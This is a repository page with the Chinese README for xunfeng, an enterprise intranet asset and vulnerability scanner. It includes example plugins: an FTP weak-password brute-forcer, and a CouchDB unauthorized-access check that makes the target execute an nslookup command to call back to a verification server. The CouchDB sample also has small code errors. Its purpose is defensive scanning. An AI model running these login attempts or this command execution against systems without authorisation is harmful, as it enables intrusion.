# xunfeng **Repository Path**: ws_dev_sec_ops/xunfeng ## Basic Information - **Project Name**: xunfeng - **Description**: 巡风是一款适用于企业内网的漏洞快速应急,巡航扫描系统。 - **Primary Language**: Python - **License**: GPL-3.0 - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 41 - **Created**: 2018-09-17 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # 巡风 [![License](https://img.shields.io/aur/license/yaourt.svg)](https://github.com/ysrc/xunfeng/blob/master/LICENSE) ---------- **巡风**是一款适用于企业内网的`漏洞快速应急、巡航扫描`系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。 **本软件只做初步探测,无攻击性行为。请使用者遵守《[中华人民共和国网络安全法](http://www.npc.gov.cn/npc/xinwen/2016-11/07/content_2001605.htm)》,勿将巡风用于非授权的测试,YSRC/同程安全应急响应中心/同程网络科技股份有限公司不负任何连带法律责任。** 其主体分为两部分:`网络资产识别引擎`,`漏洞检测引擎`。 网络资产识别引擎会通过用户配置的IP范围`定期自动`的进行端口探测(支持调用MASSCAN),并进行指纹识别,识别内容包括:服务类型、组件容器、脚本语言、CMS。 漏洞检测引擎会根据用户指定的`任务规则`进行定期或者一次性的漏洞检测,其支持2种插件类型、标示符与脚本,均可通过web控制台进行添加。 ## 安装指南 [![Python 2.7](https://img.shields.io/badge/python-2.7-yellow.svg)](https://www.python.org/) [![MyGet](https://sec-pic-ly.b0.upaiyun.com/xunfeng/static/MongoVersion.svg?a=1)](https://www.mongodb.com/download-center?jmp=nav) 国内镜像 https://code.aliyun.com/ysrc/xunfeng.git * [Windows 安装指南](./docs/install/Windows.md) * [OSX 安装指南](./docs/install/OSX.md) * [Linux 安装指南](./docs/install/Linux.md) * [Docker 安装指南](./docs/install/Docker.md) * [Linux 一条命令安装](./docs/install/Linux_AutoInstall.md) ## 配置指南 - 在配置-爬虫引擎-网络资产探测列表 设置内网IP段**(必须配置,否则无法正常使用,每个IP段最大限制为10个B段)**。 - 在配置-爬虫引擎-资产探测周期 设置计划规则。 - 可启用MASSCAN(探测范围为全端口)代替默认的端口探测脚本,需安装好MASSCAN后配置**程序完整绝对路径**,点击开启即可完成切换。  MASSCAN需chmod +x 给执行权限,并手动执行确保可正常运行后再开启。 - 其他配置根据自身需要进行修改。 ## 插件编写 漏洞插件支持2种类型,json标示与python脚本,可以通过官方推送渠道安装或者自行添加。 **JSON标示符** ![](https://sec-pic-ly.b0.upaiyun.com/img/161220/261479B35BD86E479D6E40DAA990E700749CA50E.png) **Python脚本** 插件标准非常简洁,只需通过 `get_plugin_info` 方法定义插件信息,`check`函数检测漏洞即可。 ```python # coding:utf-8 import ftplib def get_plugin_info(): # 插件描述信息 plugin_info = { "name": "FTP弱口令", "info": "导致敏感信息泄露,严重情况可导致服务器被入侵控制。", "level": "高危", "type": "弱口令", "author": "wolf@YSRC", "url": "", "keyword": "server:ftp", # 推荐搜索关键字 } return plugin_info def check(ip, port, timeout): # 漏洞检测代码 user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web'] for user in user_list: for pass_ in PASSWORD_DIC: # 密码字典无需定义,程序会自动为其赋值。 pass_ = str(pass_.replace('{user}', user)) try: ftp = ftplib.FTP() ftp.timeout = timeout ftp.connect(ip, port) ftp.login(user, pass_)                if pass_ == '': pass_ = 'null'                if user == 'ftp' and pass_ == 'ftp': return u"可匿名登录" return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) # 成功返回结果,内容显示在扫描结果页面。 except: pass ``` 此外系统内嵌了辅助验证功能: > DNS:触发,nslookup randomstr IP,验证, http://ip:8088/randomstr ,返回YES即存在。 > HTTP:触发,http://ip:8088/add/randomstr ,验证, http://ip:8088/check/randomstr ,返回YES即存在。 使用例子: ```python import urllib2 import random import socket def get_plugin_info(): # 插件描述信息 plugin_info = { "name": "CouchDB未授权访问", "info": "导致敏感信息泄露,攻击者可通过控制面板执行系统命令,导致服务器被入侵。", "level": "高危", "type": "未授权访问", "author": "wolf@YSRC", "url": "", "keyword": "server:couchdb", # 推荐搜索关键字 } def get_ver_ip(ip): csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) csock.connect((ip, 80)) (addr, port) = csock.getsockname() csock.close() return addr def random_str(len): str1="" for i in range(len): str1+=(random.choice("ABCDEFGH1234567890")) return str(str1) def check(ip,port,timeout): rand_str = random_str(8) cmd = random_str(4) server_ip = get_ver_ip() req_list = [ ["/_config/query_servers/%s"%(cmd),'"nslookup %s %s>log"'%(rand_str,server_ip)], ["/vultest123",''], ["/vultest123/test",'{"_id":"safetest"}'] ] for req_info in req_list: try: request = urllib2.Request(url+req_info[0],req_info[1],timeout=timeout) request.get_method = lambda: 'PUT' urllib2.urlopen(request) except: pass try: req_exec = urllib2.Request(url + "/vultest123/_temp_view?limit=11",'{"language":"%s","map":""}'%(cmd)) req_exec.add_header("Content-Type","application/json") urllib2.urlopen(req_exec) except: pass check = urllib2.urlopen("http://%s:8088/%s"%(server_ip,rand_str)).read() if 'YES' in check: return u"未授权访问" ``` ## 流程演示视频 [![](https://sec-pic-ly.b0.upaiyun.com/xunfeng/static/intro.png)](https://sec-pic-ly.b0.upaiyun.com/xunfeng/xunfeng.mp4) ## 文件结构 │ Config.py # 配置文件 │ README.md # 说明文档 │ Run.bat # Windows启动服务 │ Run.py # webserver │ Run.sh # Linux启动服务,重新启动前需把进程先结束掉 │ ├─aider │ Aider.py # 辅助验证脚本 │ ├─db # 初始数据库结构 │ ├─masscan # 内置编译好的Masscan程序(CentOS win64适用),需要chmod+x给执行权限(root),若无法使用请自行编译安装。 ├─nascan │ │ NAScan.py # 网络资产信息抓取引擎 │ │ │ ├─lib │ │ common.py 其他方法 │ │ icmp.py # ICMP发送类 │ │ log.py # 日志输出 │ │ mongo.py # 数据库连接 │ │ scan.py # 扫描与识别 │ │ start.py # 线程控制 │ │ │ └─plugin │ masscan.py # 调用Masscan脚本 │ ├─views │ │ View.py # web请求处理 │ │ │ ├─lib │ │ Conn.py # 数据库公共类 │ │ CreateExcel.py # 表格处理 │ │ Login.py # 权限验证 │ │ QueryLogic.py # 查询语句解析 │ │ │ ├─static #静态资源目录 │ │ │ └─templates #模板文件目录 │ └─vulscan │ VulScan.py # 漏洞检测引擎 │ └─vuldb # 漏洞库目录 扫描下方二维码关注YSRC公众号,回复自己的微信号+巡风,会有人拉你进巡风的微信讨论群。 ![](http://mmbiz.qpic.cn/mmbiz/PAV8ewtdsKpkeG9VRYNhC76iacVSe3ichYiajictdF2Q34PQo7iaPV15jjGiaAev6SqpeK5maDvtAYUtqXEYUib4ljM3A/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1)